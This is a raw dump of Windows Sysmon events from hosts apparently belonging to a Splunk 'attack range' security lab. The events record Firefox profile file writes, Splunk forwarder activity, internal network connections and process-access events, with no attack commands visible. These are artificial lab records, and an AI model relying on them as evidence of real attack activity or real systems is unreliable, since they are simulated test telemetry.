Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\default\https+++docs.microsoft.com\ls\data.sqlite-journalMD5=C8A2B41EA4FBA36C3F14B70089EA91EF,SHA256=C7569A1C1D4C138B72A6E718ECE760909CA5B76B5748E6CF8E5D06715BA0EAAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:36.901{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\default\https+++docs.microsoft.com\ls\data.sqlite-journalMD5=793F67B0921834972ADCEBE8261542FC,SHA256=83B4FC8CFE6F6F89FD22EA2C79989D412169985E567FF4EA2DFA542347044B4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:36.893{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0DA93B3BDCA63401BD7CE7D1A6C8AE6,SHA256=58E789E30680765FC1417AF2954840168EB5B330F83174D7694F0D1043CAEB1E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216760Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:34.551{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51350-false10.0.1.12-8000- 23542300x8000000000000000216762Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:37.905{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FD0410EAC162779FA6A0C78A97C2708,SHA256=1571C854CD772E7F8F899D4EB30FC07C519F80372EC0717E08FDE11995F28403,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:37.924{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7268CF37DC33362A5F4590D9746859B4,SHA256=CDF55D01072124FAF62A3F0ACF51D95B3BE83025B83671C0F55A2CF35FF9733D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:37.551{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:37.549{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:37.547{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=0AE461028C6AB1E91A1989073E5AAC96,SHA256=A7B6F7FB4D812161D5F679492E55301DFF06142CEA5D05978E5D2F53FF780303,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:37.539{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:37.536{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:37.180{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AC-6216-1705-000000003802}5396C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+eb71a2|C:\Program Files\Mozilla Firefox\xul.dll+b937e2|C:\Program Files\Mozilla Firefox\xul.dll+270212|C:\Program Files\Mozilla Firefox\xul.dll+26ffea|C:\Program Files\Mozilla Firefox\xul.dll+ecf9af|C:\Program Files\Mozilla Firefox\xul.dll+1b32ca7|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b3413d|C:\Program Files\Mozilla Firefox\xul.dll+1b36276|C:\Program Files\Mozilla Firefox\xul.dll+1788539|C:\Program Files\Mozilla Firefox\xul.dll+1787a03|C:\Program Files\Mozilla Firefox\xul.dll+3b68b39|C:\Program Files\Mozilla Firefox\xul.dll+3b68ead|C:\Program Files\Mozilla Firefox\xul.dll+3828f11|C:\Program Files\Mozilla Firefox\xul.dll+2ef8558|C:\Program Files\Mozilla Firefox\xul.dll+1713cd7|C:\Program Files\Mozilla Firefox\xul.dll+16dae6b|C:\Program Files\Mozilla Firefox\xul.dll+150ced|C:\Program Files\Mozilla Firefox\xul.dll+1bddb2b|C:\Program Files\Mozilla Firefox\xul.dll+179ae0c|C:\Program Files\Mozilla Firefox\xul.dll+13b7d2 23542300x8000000000000000216763Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:38.905{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=677038D46E049BAC19A3F3C324377663,SHA256=0BB3DD394A3E535AA78701CB1AA794C8DB796A6D58C46F92A03E020537848555,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:38.935{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B7465AB34AF34C802EFA9B3F4140CEB,SHA256=ECF713C24C31E0E936F9F95DB08EAF82D799F5E1C209FF795DCAC749E080A1B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:38.631{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmMD5=07BA99692562AF132DCB603A388DA47F,SHA256=8568CBC331A24096027DEFD2F4ED12F50EF0C73DBC5A73C8FF5135F793AC587D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:38.039{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:39.944{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F10DA1BE23BFD75AD70232FFB5A13162,SHA256=38214A10B47F6F6EB11FAE0A4024A1F0B760A3291B6A0D5DA239AF3D1B561D22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216764Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:39.920{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B84C00E6F6228C5DA2EE6BFD01E804E8,SHA256=E88CB94DD18C33F6FC3ECE97E3D59B129B174B7C6BF44E5F4B4B3675098447E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:39.831{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1B05-000000003802}5612C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e38528|C:\Program Files\Mozilla Firefox\xul.dll+840734|C:\Program Files\Mozilla Firefox\xul.dll+834311|C:\Program Files\Mozilla Firefox\xul.dll+19c76f6|C:\Program Files\Mozilla Firefox\xul.dll+168da29|C:\Program Files\Mozilla Firefox\xul.dll+19ee82f|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+18db08|C:\Program Files\Mozilla Firefox\xul.dll+18ca0f|C:\Program Files\Mozilla Firefox\xul.dll+43f0b91|C:\Program Files\Mozilla Firefox\xul.dll+445b03b|C:\Program Files\Mozilla Firefox\xul.dll+445be29|C:\Program Files\Mozilla Firefox\xul.dll+1f9ac83|C:\Program Files\Mozilla Firefox\firefox.exe+9dd0|C:\Program Files\Mozilla Firefox\firefox.exe+1ca08|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:39.804{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:39.750{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:39.737{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:39.737{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216765Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:40.951{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E8D88E6DCCF7F9788E2092EE2B677F5,SHA256=FEDC2941A454723FD323730CDFCA84FCE34964EE756876AA7D636BB88DA91004,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:38.666{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53487-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000216767Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:41.951{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6830A541D95CFF1851F65C37BB97A68,SHA256=D423E1264F552AE58D4CD36BF18B758E33926ADBC23FBCED6D184472F6DF3871,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:41.178{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86ADAAAB032499EDC5C514A46A103B7A,SHA256=21EC699C1A91F7A18965AF1090092E6171A42D56D00C95C5874EB6EAC1FF7C89,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216766Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:39.660{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51351-false10.0.1.12-8000- 23542300x8000000000000000216768Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:42.951{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80F582507D5AE147E53849CFED1FC70B,SHA256=1BFBA7717A98DB63EEE1694D6907301B767A3A165C24ADF6D901A6047DBBC1B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:42.408{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5793150D657E09753A61A28AA4FBB374,SHA256=9AF23913FC83AE5C671C0C6A1B22A8A281284AFE92850F5AA9462BA7FBAD2340,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:39.252{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53488-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000216769Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:43.967{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94CC7B926F4F9AAD556AE19B2A4E317C,SHA256=D3C32DF8019F119B1D6AE10B864878746B29B2CDA80745954269546CCEF9785D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:43.415{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5929C4F7DF8A9E0FF0A6DDF2BAF2FDD8,SHA256=D6A9936644786481AA6DD3EBAC43DEBE58D688468272FE2F17214577AD5D7174,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216783Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:44.983{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-11C0-6216-5E04-000000003902}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216782Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:44.983{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216781Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:44.983{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216780Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:44.983{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216779Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:44.983{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216778Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:44.983{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216777Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 